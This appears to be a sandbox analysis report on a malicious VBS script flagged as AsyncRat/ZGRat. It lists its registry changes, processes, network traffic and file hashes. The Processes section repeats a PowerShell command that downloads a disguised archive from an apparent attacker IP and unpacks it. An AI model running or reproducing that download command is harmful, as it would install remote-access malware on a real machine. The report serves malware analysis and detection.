Analysis Overview
SHA256
e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8
Threat Level: Known bad
The file g4.txt was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Detect ZGRat V1
ZGRat
Downloads MZ/PE file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-12 14:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-12 14:32
Reported
2024-03-12 14:46
Platform
win7-20240220-en
Max time kernel
350s
Max time network
705s
Command Line
Signatures
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73A541C1-E07D-11EE-9A4D-7A846B3196C4} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Notepad.exe | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://users/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.251.36.4:443 | www.google.com | udp |
| NL | 142.251.36.4:443 | www.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.243.44.136:80 | tcp | |
| US | 104.243.44.136:80 | tcp | |
| US | 104.243.44.136:80 | tcp | |
| US | 104.243.44.136:80 | tcp | |
| US | 104.243.44.136:443 | tcp | |
| US | 104.243.44.136:443 | tcp | |
| US | 104.243.44.136:443 | tcp | |
| NL | 216.58.214.3:80 | www.gstatic.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | tcp |
| US | 104.243.44.136:443 | tcp | |
| US | 104.243.44.136:443 | tcp | |
| US | 104.243.44.136:443 | 104.243.44.136 | tcp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | udp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | tcp |
Files
memory/2920-4-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2920-5-0x00000000026F0000-0x00000000026F8000-memory.dmp
memory/2920-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2920-7-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2920-9-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-10-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
\??\pipe\crashpad_552_UFWQIIINUEXGHRGS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 07d6a990d48d06a61fd3e7e83c1c1d1c |
| SHA1 | da2e6cdc9a70a5da52655f3cb2b9f06071c07d5c |
| SHA256 | 7d06579813d4309157456e76d8b5cefc7efa4ed45bdc00e932323f4f361c4253 |
| SHA512 | 1cd0eb1b9baa62208ad0e7c1ec34735e42dd9bc23c14ff72ba66795b6570eb3b706b609d27d144a628a37b2b7d9e67fcb222fd26d63a4dd537afafc573dadb4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f3886cb2abbd410384d2e247c1a19520 |
| SHA1 | 90f9e2b731fa513c1e86b638460df7d718ad0b07 |
| SHA256 | 50dbdc0db6f0d6fdc0e792c2b2fcfef681c2d3c9f9c5f9ffe2e6a23dca06378b |
| SHA512 | 95bfaf449af0231d3dc60e7dcc5ef6e5f265db3ac29890533bdc592d2feff493796b7d058a477fbe3042362d0cc382c1e02bd77af51b6036137fd4f8b3fe5a54 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b233c62080702539447e5a72cdede799 |
| SHA1 | c2ff017b4be967a0646420e2a46a327779a2f1c9 |
| SHA256 | e549acf1a8b5e2d31a26c3694302a5b0c28f0cf51b3dae9960613ea0655ece41 |
| SHA512 | 9471a6be1204970ed0968f72a2f7537a4c5c2284c6c87d1b149fe5b4178b581fc551a8c12839aace012336c65814c65f69dabe2e871262b35a5a8557bf17db5e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 14cc8305ff7b6186efbae3b462fb60df |
| SHA1 | 1c2ace083e6a7a86956e6f890524c065b572878b |
| SHA256 | 734816f6f9791578d22c82213884a3cf8fa0b7ab83ee85fad9c5e6798d4bbe9e |
| SHA512 | 00e0521d2188a69b1829d43db7b4f55898a1b649295d0c9fb98d7be088e8585ec6af7feb2e1645edd349380373973a94ffa77a6b6a4f2205d13760a3a8789c5f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d5ab74ae398f2d9b648d5fe5c4779a91 |
| SHA1 | 617ae2d562c55ab47608003f1625c7e06a3915a2 |
| SHA256 | af4f562ecaf11c4f71ac62fa6ca1cca2face95aaf247820b70ddd01e2d01284b |
| SHA512 | b14b252d32a557c82b94020c87722e3cbc75afc688bcb3c492c9bc2a327da7906ef04efb05887f92e18569c825755ab8c862026aacc789e934dbf54c7cbb6dff |
memory/300-177-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-176-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/300-179-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-178-0x00000000020B0000-0x00000000020B8000-memory.dmp
memory/300-181-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-180-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-183-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-182-0x0000000002C20000-0x0000000002CA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cadd7e6cf4e00a0cb1eed886fabeea2d |
| SHA1 | 85253620e109ba0d4e8aa58e37e9fa23ee750ae5 |
| SHA256 | 8a540158f7b0f8c5c459350aaeaca020a97d8339e87b87aa2295c1ddf8878ed7 |
| SHA512 | 59adbac128efb40f9164fbee4f719cb73502bffacb86dd4e42cebe29704f05f7468bf7be99aa0453589695a22146106fb815e2df1c0c0bec6fef91fac9d81868 |
memory/300-191-0x0000000002C20000-0x0000000002CA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ef61fcc9-be5e-439b-a380-392b8ddc9ac7.tmp
| MD5 | 05705d148f14867cd4640a04eb817514 |
| SHA1 | adbf4fe123a665079de80164e90a87e3d70682af |
| SHA256 | a1da84bf5b90d067dbe112810afa07a87d803398950b937c03816f1d1266198d |
| SHA512 | 89d9ea32df6661e912429110cb4d748195ec31a42913f23d8337df5d315f610558606ed7c14f934fa88b395f2376328514f93d6157cfbf334f9416920b133606 |
memory/300-199-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-208-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-207-0x0000000002C20000-0x0000000002CA0000-memory.dmp
